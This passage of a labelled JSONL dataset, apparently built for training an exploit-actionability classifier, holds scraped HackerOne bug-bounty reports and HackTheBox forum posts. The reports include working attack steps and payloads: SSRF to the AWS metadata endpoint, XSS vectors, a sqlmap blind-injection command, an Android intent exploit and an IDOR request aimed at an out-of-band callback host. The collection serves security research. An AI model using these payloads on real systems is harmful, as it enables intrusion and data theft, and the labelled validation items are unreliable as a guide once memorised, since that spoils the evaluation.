"weak_cve_metadata_plus_actionability_terms"} -{"id": "c5db390efafaadb2036b", "text": "[Server-Side Request Forgery (SSRF)] Full read SSRF at █████████ [HtUS]\n\nHeyy there,\nWe have found a full read ssrf vuln in https://█████ , we were able to hit the AWS Metadata endpoint (http://███████) though the SSRF Vuln.\n\n\n------------\n\n**Steps to reproduce:**\n\n1.Goto https://██████/users/create and create an account\n2.After you account is verified , get login\nIf for some reasons you are not the verification code, try with a gmail id\n\n3.Now visit: https://████/products/create/ and fill the required details\n4.Once your product is created, click on `New Configuration` which is under *LRS Configurations*\n\n████████\n\n5.Enter this as the input for * LRS URL *: `http://█████████/latest/meta-data?` (the question mark at the end is important)\n6.Under *Basic Auth User & Pass* enter test for both fields and click on `Create new LRS configuration` \n\n█████\n\n7.Once the `Configuration` is created click on the `Test` button beside the conifguration name\n████\n8.Now you will be redirected to the homepage, so go back to the product page\n9.Under `Past Results` you should be able to see a new entry\n10.Click on `Manage Test record` > `Download log`\n11.Now check the `Include HTTP` checkbox and from the `Log Format` drop down menu choose *Plain text*\n\nA file with the name `log` should be downloaded in your computer, just open it and there you will find the response from the aws meta data endpoint:\n\n```\n\n\"\"\nfailed\n\"SyntaxError: Unexpected token a in JSON at position 0\"\nREQUEST SUPERREQUEST\n_______________________________________\nPOST /latest/meta-data?/statements HTTP/1.1\nX-Experience-API-Version: 1.0.3\nAuthorization: Basic dGVzdDp0ZXN0\nhost: ██████████\naccept: application/json\ncontent-type: application/json\ncontent-length: 324\nConnection: close\n\n{\"actor\":{\"objectType\":\"Agent\",\"name\":\"xAPI mbox\",\"mbox\":\"mailto:████\"},\"verb\":{\"id\":\"http://███\",\"display\":{\"en-GB\":\"attended\",\"en-US\":\"attended\"}},\"object\":{\"objectType\":\"Activity\",\"id\":\"http://www.example.com/meetings/occurances/34534\"},\"id\":\"3b9e4565-07ac-475f-be1f-d5f590f40779\"}\n\nRESPONSE SUPERREQUEST\n_______________________________________\nHTTP/1.0 200 OK\naccept-ranges: bytes\ncontent-length: 326\ncontent-type: text/plain\ndate: Wed, 06 Jul 2022 13:48:12 GMT\nlast-modified: Thu, 30 Jun 2022 09:37:12 GMT\nconnection: close\nserver: EC2ws\n\nami-id\nami-launch-index\nami-manifest-path\nblock-device-mapping/\nevents/\nhibernation/\nhostname\nidentity-credentials/\ninstance-action\ninstance-id\ninstance-life-cycle\ninstance-type\nlocal-hostname\nlocal-ipv4\nmac\nmetrics/\nnetwork/\nplacement/\nprofile\npublic-hostname\npublic-ipv4\npublic-keys/\nreservation-id\nsecurity-groups\nservices/\n=======================================\nREQUEST SUPERREQUEST\n_______________________________________\nGET /latest/meta-data?/statements?statementId=3b9e4565-07ac-475f-be1f-d5f590f40779 HTTP/1.1\nX-Experience-API-Version: 1.0.3\nAuthorization: Basic dGVzdDp0ZXN0\nhost: ██████\nConnection: close\n\nRESPONSE SUPERREQUEST\n_______________________________________\nHTTP/1.0 200 OK\naccept-ranges: bytes\ncontent-length: 326\ncontent-type: text/plain\ndate: Wed, 06 Jul 2022 13:48:12 GMT\nlast-modified: Thu, 30 Jun 2022 09:37:12 GMT\nconnection: close\nserver: EC2ws\n\nami-id\nami-launch-index\nami-manifest-path\nblock-device-mapping/\nevents/\nhibernation/\nhostname\nidentity-credentials/\ninstance-action\ninstance-id\ninstance-life-cycle\ninstance-type\nlocal-hostname\nlocal-ipv4\nmac\nmetrics/\nnetwork/\nplacement/\nprofile\npublic-hostname\npublic-ipv4\npublic-keys/\nreservation-id\nsecurity-groups\nservices/\n=======================================\n\n```\n\n## Impact\n\nAn attacker can dump aws keys , reach internal hosts and etc\n\n\nThankyou\nRegards\nheint and sudi", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "cbf7b00f4d59657d73a6", "text": "[Cross-site Scripting (XSS) - Reflected] cross site scripting in : mtn.bj\n\n## Summary:\nXss vulnerability in mtn.bj in file name \n\n## Steps To Reproduce:\n\n\n 1.Go to : \nhttps://www.mtn.bj/business/ressources/formulaires/plan-de-localisation-de-compte/?next=https://www.mtn.bj/business/ressources/formulaires/formulaire-de-souscription/\n 2 - fill all inputs with any data \n3 - in file upload upload a file with payload file name such as : \"> HTTP/1.1\nHost: 127.0.0.1:9090\n[REDACTED]\n\n{\"mountPoint\":\"simpleuser\",\"backend\":\"owncloud\",\"authMechanism\":\"password::logincredentials\",\"backendOptions\":{\"host\":\"cq6xxrdnw1941wu9jk4gcyfuglmfa4.oastify.com\",\"root\":\"\",\"secure\":true},\"testOnly\":true,\"id\":,\"mountOptions\":{\"enable_sharing\":true,\"encoding_compatibility\":false,\"encrypt\":true,\"filesystem_check_changes\":1,\"previews\":true,\"readonly\":false}}\n```\n3.Next, log in to the application with an administrative user account or any other role and establish a storage connection.\n4.Observe that each new storage created increments the ID automatically. For instance, it could become 28.\n5. Using the standard user role, issue the request once more to modify the ID linked to the administrative storage. Observe that this action leads to the removal of the storage from the administrator's account.\n\nVIDEO POC:\n{F2778950}\n\n## Impact\n\nThis finding has a huge impact on the application, including data loss, service disruption, unauthorized actions, data privacy concerns, security risks, and potential reputation damage.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "fa231b3351370b8fb383", "text": "[Cross-site Scripting (XSS) - Stored] XSS in HTML generated by RDoc\n\nXSS is possible in some places because escaping is not enough in the html generation part of RDoc.\n\n\n### RDoc::Markup::ToHtml#gen_url\n\nhttps://github.com/ruby/rdoc/blob/v6.3.0/lib/rdoc/markup/to_html.rb#L330\n\n```ruby\n def gen_url url, text\n scheme, url, id = parse_url url\n\n if %w[http https link].include?(scheme) and\n url =~ /\\.(gif|png|jpg|jpeg|bmp)$/ then\n \"\"\n else\n if scheme != 'link' and /\\.(?:rb|rdoc|md)\\z/i =~ url\n url = url.sub(%r%\\A([./]*)(.*)\\z%) { \"#$1#{$2.tr('.', '_')}.html\" }\n end\n\n text = text.sub %r%^#{scheme}:/*%i, ''\n text = text.sub %r%^[*\\^](\\d+)$%, '\\1'\n\n link = \"#{text}\"\n\n link = \"#{link}\" if /\"foot/ =~ id\n\n link\n end\n end\n```\n\n```md\n[](a)\n\n[click](javascript:alert`javascript_scheme`)\n\n[onmouseover](http://\"/onmouseover=\"alert`on_mouse_link`\")\n\n[link_image](http://\"onerror=\"alert`link_image`\".png)\n```\n\nHTML containing the following XSS will be generated.\n\n```html\n

\n\n

click

\n\n

onmouseover

\n\n

\n```\n\n\n### RDoc::Markup::ToHtml#handle_RDOCLINK\n\nhttps://github.com/ruby/rdoc/blob/v6.3.0/lib/rdoc/markup/to_html.rb#L97\n\n```ruby\n def handle_RDOCLINK url # :nodoc:\n case url\n when /^rdoc-ref:/\n $'\n when /^rdoc-label:/\n text = $'\n\n text = case text\n when /\\Alabel-/ then $'\n when /\\Afootmark-/ then $'\n when /\\Afoottext-/ then $'\n else text\n end\n\n gen_url url, text\n when /^rdoc-image:/\n \"\"\n else\n url =~ /\\Ardoc-[a-z]+:/\n\n $'\n end\n end\n```\n\n```markdown\nrdoc-image:\">\"\n\nrdoc-label::path::\">\"\n\nrdoc-label::\">\"\n\nrdoc-ref:\">\"\n\nrdoc-xxx:\">\"\n````\n\n```html\n

“”>

\n\n

“” href=“#”>:path::“>

\n\n

“” href=“#”>:“>

\n\n

“>

\n\n

“>

\n```\n\n\n### RDoc::Markup::ToHtmlSnippet#gen_url\n\nhttps://github.com/ruby/rdoc/blob/v6.3.0/lib/rdoc/markup/to_html_snippet.rb#L168\n\n```ruby\n def gen_url url, text\n if url =~ /^rdoc-label:([^:]*)(?::(.*))?/ then\n type = \"link\"\n elsif url =~ /([A-Za-z]+):(.*)/ then\n type = $1\n else\n type = \"http\"\n end\n\n if (type == \"http\" or type == \"https\" or type == \"link\") and\n url =~ /\\.(gif|png|jpg|jpeg|bmp)$/ then\n ''\n else\n text.sub(%r%^#{type}:/*%, '')\n end\n end\n```\n\n```markdown\n[](a)\n```\n\nXSS tag is embedded in `js/search_index.js`.\n\n```js\n[\"search\",\"\",\"target/search_md.html\",\"\",\"

\\n\"]\n````\n\n### Rubygems RDoc home\n\nhttps://github.com/ruby/rdoc/blob/v6.3.0/lib/rdoc/generator/template/darkfish/index.rhtml#L20\n\n```html\n

This is the API documentation for <%= @title %>.\n```\n\nXSS is possible because `@title` is not escaped in the template used when RDoc is run by rubygems.\n\n---\n\n### PoC\n\n```\n$ gem -v\n3.2.17\n\n$ rdoc -v\n6.3.1\n```\n\nBuild the gem using the attached `xss.md` and `rdoc_xss.gemspec` files.\n\n```\n$ gem build rdoc_xss.gemspec\n\n$ gem install rdoc_title_xss-0.0.1.gem\n\n$ gem sever\n```\n\nConfirm multiple xss by opening the http://0.0.0.0:8808/doc_root/rdoc_title_xss-0.0.1/ screen in browser.\n\n{F1291736}\n\n## Impact\n\nXSS may be included if there is a function that generates html w", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "80a0274a2a35b91b270d", "text": "[Business Logic Errors] Federated share accepting/declining is not logged in audit log\n\nIn relation to https://hackerone.com/reports/1177353\n\n1. Enable the audit log\n2. Share a file to a federated user\n3. So far all looks good in the log\n4. the recipient checks either accepts or declines the share\n5. There is no line regarding this in the logs.\n\n## Impact\n\nThe audit log is used to get a full trail of the actions which is now incompletely. With possible important information.\nIt seems to be also listed on https://portal.nextcloud.com/article/using-the-audit-log-44.html\nFrom my point of view a declined share is unshared again.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "21bc5c0963256517f5b0", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS via File Upload\n\n## Summary:\nReflected XSS in \" https://reddit.zendesk.com/hc/en-us/requests/new \" via file upload\n\n## Impact:\n\n!!\nattacker can send that email to victim and steal user account or cookies\n\nCross site scripting attacks can have devastating consequences. Code injected into a vulnerable application can exfiltrate data or install malware on the user’s machine. Attackers can masquerade as authorized users via session cookies, allowing them to perform any action allowed by the user account.\n\nXSS can also impact a business’s reputation. An attacker can deface a corporate website by altering its content, thereby damaging the company’s image or spreading misinformation. A hacker can also change the instructions given to users who visit the target website, misdirecting their behavior.\n\n* Perform any action within the application that the user can perform.\n* View any information that the user is able to view.\n* Modify any information that the user is able to modify.\n* Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.\n\nNote ! \nsvg work with all browsers\nxml file work with all browsers except ( google chrome )\n\n\n## Steps To Reproduce:\n\n 1. go to \" https://reddithelp.com/hc/en-us/requests/new \" and select any type of report\n 2. type your email in email fileds and type any text in other fileds \n 3. in upload function upload or file I attached and send the request\n 4. now go to your mail box go to reddit mail and select the file you uploaded \n 5. after downlaoded the file open it in browser it will fire !\n\n## Supporting Material/References:\n\n * Upload this files to site\n\n{F2089769}\n{F2089770}\n\n## Impact\n\nSteal user cookie \nAccount Takeover !\nPerform any action within the application that the user can perform.\nView any information that the user is able to view.\nModify any information that the user is able to modify.\nInitiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b1e42434c1378604a68c", "text": "[Cross-site Scripting (XSS) - Stored] Stored XSS in plan name field (Acronis Cyber Protect)\n\n## Summary\nIt has been identified that a known and previously reported stored XSS vulnerability is still possible to be exploited and abused in the recent version of Acronis Cyber Protect (*15.0.31791*), released last March 7, 2023, (*evidence attached*).\nThis report is for no other purpose than to make it known that the vulnerability still persists.\n\n## Steps To Reproduce\nBe sure to follow the steps below to replicate this vulnerability:\n\n 1. Create a new plan. Add a valid device.\n 1. As plan name type the following payload: ``\n 1. Save the changes and wait for the plan to be created.\n 1. Now stop the plan by pressing the \"Stop\" button.\n 1. Before stopping it will ask for confirmation. Press the red \"Confirm\" button and the vulnerability will be triggered immediately.\n\nNote that just below the browser window a bubble will appear with a temporary message trying to render our payload.\n\n## Recommendations\nYou can avoid such vulnerabilities by escaping, validating data entries in fields and sanitizing suspicious and/or malicious entries. This text field is not supposed to contain/accept special characters or payloads.\n\n## Impact\n\nAn XSS attack allows an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim or for phishing attacks.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c309b4227baaa027fb5d", "text": "[Information Disclosure] [███████] Information disclosure due unauthenticated access to APIs and system browser functions\n\n**Description:**\nMultiple information exposure vulnerabilites were identified in a Jira Server instance (unauthenticated access to APIs and system browser functions). This report describes a combination of two separate vulnerabilities in two separate services This chain of vulnerabilities allows unauthenticated attacker to run arbitrary code on a server inside the company's internal network. the vulnerable registered as references JRASERVER-73060\n\n\n## References\nhttps://jira.atlassian.com/browse/JRASERVER-73060\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-14179\n\n## Impact\n\nUnauthorised access and the data should not be visible.\nProject categories, resolutions, and usernames are listed even if the API is not authenticated\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-14179\n\n## Steps to Reproduce\n1. Navigate visit the target scope is https://█████████/secure/JiraCreditsPage!default.jspa\n 1. And now we found a directory is jira sensitive\n 1. Lets send a curl request to the `?maxResults=1000` endpoint, as shown below. In the request, point the post request to the server address you want to send the request to:\n\nHere's the HTTP Parameter request that the issue:\n```\nGET /rest/menu/latest/admin HTTP/1.1\nHost: ███\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\nsec-ch-ua-platform: \"Mac OS\"\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\n```\n * https://██████/secure/JiraCreditsPage!default.jspa\n * https://███████/rest/menu/latest/admin?maxResults=1000\n\n## Suggested Mitigation/Remediation Actions\n## Workaround\nAnonymous access to endpoints listed below is restricted starting Jira 9.0. On future Jira 8.x releases and all LTS releases it is possible to restrict anonymous access with feature flags. On Jira 8.x to restrict anonymous access to the endpoint you need to disable feature flag aka provide ``.disabled On Jira 9.0 you need to enable the same feature flag aka provide ``.enabled\n\n\n**You can use given feature flags: **\n`/rest/api/2/projectCategory` - (Anonymous access disabled completely) \n`/rest/api/2/resolution` - (Anonymous access blocked only when there is no projects available for anonymous users) \n`/rest/menu/latest/admin` - There is currently no feature flag to disable anonymous access, please check linked ticket in \"duplicates by\" to track this problem.\n\n**Refferences**\nhttps://hackerone.com/reports/994612 \n[JRASERVER-73060](https://jira.atlassian.com/browse/JRASERVER-73060)", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2020-14179"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e7396ebeeeba5568d803", "text": "There are some shell upgrades to get a usable bash shell, have a look at different methods…", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-03-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a62c3a4e3caec7bfef76", "text": "[Forced Browsing] Improper deep link validation\n\nThe application contains an activity which validates and handles the deep link requests, initiated from a VIEW intent action. The declared schemes include **http** and **https** request for the domain shopify.com as well as \\*.myshopify.com. The path prefixes include mostly subdirectories of the /admin path , thus when a deep link request is created the application routes this request to the corresponding activity of the application. \n**It was identified that it is possible to bypass the path prefix restrictions by adding appending a \"../\" to the end of the URI. This results on loading arbitrary urls in the application's Webview, leveraging its Javascript capabilities as well as the EASDK bridge in order to compromise the integrity of the application.**\nFor example in order to access the https://someone.myshopify.com instead of https://someone.myshopify.com/admin/collections in the application's webview, the following intent may be sent: \n```\nam start -W -a android.intent.action.VIEW -d \"https://ravel17.myshopify.com/admin/collections/../../\n```\nThe above intent will yield the following result: \n{F1172971}\n\nIn order to load an external URL the following steps should be followed:\n- Create a partner account and add a new app \n- Use as the app's URL the address of the 'malicious' server \n\n{F1173035}\n- Navigate to the \"Choose client store\" in order to choose the target store\n\n{F1173036}\n\n- Finally, copy the link from the \"Merchant install link\"\n\n{F1173040}\n\n- Create the following intent:\n\n```\nam start -W -a android.intent.action.VIEW -d \"https://TARGET-STORE.myshopify.com/admin/collections/.../oauth/install_custom_app?client_id=....\n```\n- The result will be the following:\n\n{F1173046}\n\n## Impact\n\nAs it is mentioned above besides the Javascript which is enabled for the specific webview, the application adds a javascript interface which is accessed via the instantiation of an EASDK object. Some potential risk (besides phishing attacks which may be considered trivial for the specific case) is showed bellow:\n\n- Access to the application's sandbox via the EASDK.redirect:\n\nEASDK.redirect(\"file:///data/data/com.shopify.mobile/shared_prefs/notification_ids.xml\")\n{F1173057}\n\n- Javascript code execution:\n\n{F1173073}", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "925359b67ab07a2fe00d", "text": "[Authentication Bypass by Primary Weakness] CVE-2023-27536: GSS delegation too eager connection re-use\n\n## Summary:\nWhen considering reuse of existing connections different `CURLOPT_GSSAPI_DELEGATION` (libcurl) `--delegation` (curl) option is not taken into consideration. This can lead to reuse of previously established connection when it should no longer be (as more strict or no delegation was requested).\n\n## Steps To Reproduce:\n\n 1. `curl --negotiate -u : --delegation \"always\" https://server/path -: --negotiate -u : --delegation \"none\" https://server/path`\n\n## Remediation\n\n- Safest option is to not reuse connections if different `CURLOPT_GSSAPI_DELEGATION` levels are being used. It **might** also be correct to not reuse connections with \"laxer\" `CURLOPT_GSSAPI_DELEGATION`: \"none\" should only allow reusing \"none\" level, \"policy\" should only allow \"none\" or \"policy\" level, while \"always\" can reuse all connections otherwise deemed appropriate for reuse.\n\n## Impact\n\nExisting connection that was established via more lax delegation will be reused for connection that should not succeed due to more restrictive delegation requested. The practical impact can vary, but I believe it is likely quite low, as it should be quite rare to have connections attempted with mixed delegation policies like this.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-27536"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "cefc742e963c1a9a3b87", "text": "[Improper Authentication - Generic] App PIN code can be bypassed in Files iOS\n\nHi Team,\n\nHope you are doing great.\n\nNote: IoS APP Vs.: 4.9.1\n\nI got a vulnerability in your applications via which an attacker is able to bypass the PIN.\nThe attacker just need to bruteforce the 4 digit PIN as unlimited tries is accepted by the application, the attacker can simply do a bruteforce and access the application.\n\nPoC:\n{F2844276}\n\n## Impact\n\nAuthentication Bypass leading to application access", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-12-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2401761aa21e85cfd604", "text": "SharpHound.ps1 doesn't work\n\nI’m trying Reel ( Hack The Box ). When I use SharpHound.ps1, the following error occurs everytime: nico@REEL C:\\Users\\nico>powershell -Exec Bypass Windows PowerShell Copyright (C) 2014 Microsoft Corporation. All rights reserved. PS C:\\Users\\nico> . .\\SharpHound.ps1 PS C:\\Users\\nico> Invoke-BloodHound -CollectionMethod All Exception calling \"Invoke\" with \"2\" argument(s): \"Method not found: '!!0[] System.Array.Empty()'.\" At C:\\Users\\nico\\SharpHound.ps1:642 char:88 + ... nvoke($Null, @(,$passed)) + ~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationExcep tion + FullyQualifiedErrorId : MissingMethodException This is the latest SharpHound.ps1. (I can’t use SharpHound.exe now)", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-11-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2e3ede3df805014a5902", "text": "[Cross-site Scripting (XSS) - Reflected] XSS DUE TO CVE-2022-38463 in https://████████\n\n**Description:**\nDuring my research, I found one of the host running ServiceNow vulnerable to CVE-2022-38463 . ServiceNow through San Diego Patch 4b and Patch 6 allows reflected XSS in the logout functionality.\n\n## Impact\n\nAttacker is able to steal victims cookies, redirect victim to attacker controlled domain, and perform various malicious activities.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1.Enter the following crafted URL in any web-browser.\n\nhttps://█████████/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)\n\n2. XSS will be triggered.\n\n## Suggested Mitigation/Remediation Actions", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-38463"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f40628c1e815a4248ce2", "text": "[Improper Access Control - Generic] Github Account Takeover from Docs page of `kubernetes-csi.github.io`\n\nReport Submission Form\n\n## Summary:\nKubernetes in its docs https://kubernetes-csi.github.io have a drivers list.\nOne of the driver was pointing to an external github account. That github account was not registered on github.com\nSo I was able to takeover the account and host PoC\n\n## Kubernetes Version:\nNA\n\n## Component Version:\nNA\n\n## Steps To Reproduce:\n\n 1. Go to https://kubernetes-csi.github.io/docs/drivers.html\n 2. Search for `MacroSAN`\n 3. Click on `MacroSAN`\n 4. You will be taken to this repository https://github.com/macrosan-csi/macrosan-csi-driver\n 5. You will see takeover message there\n\n## Supporting Material/References:\n\n- https://github.com/macrosan-csi/macrosan-csi-driver\n- https://kubernetes-csi.github.io/docs/drivers.html\n\n{F1556768}\n\n## Reference\n\n- https://hackerone.com/reports/1212853\n\n## Impact\n\nAn attacker can takeover the repository and host malicious code on it, when any user or employee will refer the docs and tries to download the dirver, they will end up using malicious code which could lead to RCE.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bb0482cf9259654eff54", "text": "maybee somebody can help me ? i try move some file to tmp directory, but always have an error (((", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b024348a01c882a5f176", "text": "[Cross-site Scripting (XSS) - Reflected] XSS DUE TO CVE-2020-3580\n\nHello Team,\nDuring my research, I found multiple hosts to be vulnerable to Cisco ASA XSS CVE-2020-3580, This vulnerability targets the saml service within the VPN. It is triggered via a POST request to domain/+CSCOE+/saml/sp/acs?tgname=a\n\n## References\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n\n## Impact\n\nWith this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\nCisco ASA\n\n## CVE Numbers\nCVE-2020-3580\n\n## Steps to Reproduce\n\n \n \n

\n \n \n \n
\n \n \n\n\n## Suggested Mitigation/Remediation Actions\nPatch Cisco ASA : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2020-3580"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8d7276f675f5700bbfd2", "text": "[Insecure Storage of Sensitive Information] sensitive data exposure\n\n## Summary:\n[A Password hash entry was found in /etc/passwd. This is a major vulnerability since /etc/passwd is a world-readable file by default. Once the password hash is found, an attacker may extract the password using a program like crack.]\n\n## Impact:\nit is high impact vulnerability .once hacker found password hash it may be leads to develop a program like crack\n\n## Steps To Reproduce:\n[https://www.reddit.com/etc%2fpasswd]\n\n 1. [add step]\n 1. [add step]\n 1. [add step]\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\n\n## Impact\n\nA Password hash entry was found in /etc/passwd. This is a major vulnerability since /etc/passwd is a world-readable file by default. Once the password hash is found, an attacker may extract the password using a program like crack.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "dd6ae9c5fd395d59f005", "text": "[SQL Injection] Blind Sql Injection in https://████████/\n\n**Description:**\n\nfirst browse url\nhttps://█████████/DSF/SmartStore.aspx?gktTg9gFCEBknhRFawes89EY4WcuDKHZNYh58W8kzOWv0SM9Nk6SFMv570fOCer/BHfPrtRYtqRvYJ88zd0KsQ==&random=0.7493498572981403#!/Storefront\n\nfind login \n\nthen notice register\n\n████████\n\n███████\n\nclick register \n\nhttps://████/DSF/SmartStore.aspx?gktTg9gFCEBknhRFawes89EY4WcuDKHZNYh58W8kzOWv0SM9Nk6SFMv570fOCer/BHfPrtRYtqRvYJ88zd0KsQ==&random=0.7493498572981403#!/RegisterUser\n\nclick Choose Facility\n█████████\n\nWe can see a search box\n█████████\n\n```\nPOST /DSF/webservices/StorefrontService.asmx HTTP/1.1\nHost: ████████\nCookie: ASP.NET_SessionId=1phpamlj3ghg13yranwpwyc4; LASTSITEACTIVITY=17b9c74a-f80b-4e48-b274-729acb2e14ad; _____SITEGUID=17b9c74a-f80b-4e48-b274-729acb2e14ad; BIGipServerdso_dla_pool=!bMk2BVeAkzRdd6t/+hAGiDi1KgdSoi+88iAAs7+CvOtONGAdcnAhOqOuh++pi3IS36YNq+YVfr5l8HI=; TS01a7bc09=01a9fe659b2979abff2645807c9ce81ffbeeeeaafa33f9038d5a1c59dd219a29ce68fa7d4edb9afe6bb9488ceb9c8dd10214f84f28; DSFPartnerID=yaY5gqbGhOY=; TS2f53739b027=085749d0e4ab200041fc059864d60f7079a5bba1c971a9b0ec2c518a8be95c59408233620a4046e908a71691ce11300072991b95acde4750057dcf4b690fc5d287bd05e77fb374c2ef003c7fa6de858098c8aded9cd3dbae4fb2b4cb23fae3f4\nContent-Length: 945\nSec-Ch-Ua: \"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\"\nAccept: application/xml\nContent-Type: application/json;charset=UTF-8\nSec-Ch-Ua-Mobile: ?0\nSoapaction: http://www.efi.com/dsf/StorefrontService/GetAllFacilitiesForNewUserRegistration\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nSec-Ch-Ua-Platform: \"Windows\"\nOrigin: https://███\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https://█████/DSF/SmartStore.aspx?6xni2of2cF01Wh1WA1f8KvqWdFIzCmht0+f1rjakhLYZYEorRbI5CMSxx2CBgN1b\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\n 17b9c74a-f80b-4e48-b274-729acb2e14ad\n49f22361-1243-4cde-9788-7bad2eb575ed\n20\nzh-CN\n\n -1\nzh-CN\ndescription\nasc\n*\n1\n10\n\n \n```\n\nsearch box exist Blind Sql Injection\n\nsearchValue is Vulnerability parameters\n\n\nsqlmap\npayload\n\npython2 sqlmap.py -r 11.txt --random-agent --batch --technique=b --dbms=mssql --force-ssl --level 3 --skip-urlencode\n\n\n11.txt is Displayed packets\n\n███\n\n\n\ndb_name()=dsfdb\n\nuser=public\\dsfwsuser\n████████\n\n\n\n\n## References\n\n## Impact\n\nAn attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n```\nPOST /DSF/webservices/StorefrontService.asmx HTTP/1.1\nContent-Length: 1002\nHost: ███████\nCookie: ASP.NET_SessionId=1phpamlj3ghg13yranwpwyc4; LASTSITEACTIVITY=17b9c74a-f80b-4e48-b274-729acb2e14ad; _____SITEGUID=17b9c74a-f80b-4e48-b274-729acb2e14ad; BIGipServerdso_dla_pool=!bMk2BVeAkzRdd6t/+hAGiDi1KgdSoi+88iAAs7+CvOtONGAdcnAhOqOuh++pi3IS36YNq+YV", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "31f836cb89ea1d7b3a6e", "text": "[Unknown] OTP reflecting in response sensitive data exposure leads to account take over\n\n## Summary:\nSensitive data that is otp is reflecting in the response of phone number otp verification in https://app.upchieve.org \n\n## Steps To Reproduce:\n\n\n 1. Signin with a account\n 2.After signin it will ask for phone number for otp verification.\n3.Capture the request using burpsuite and see the 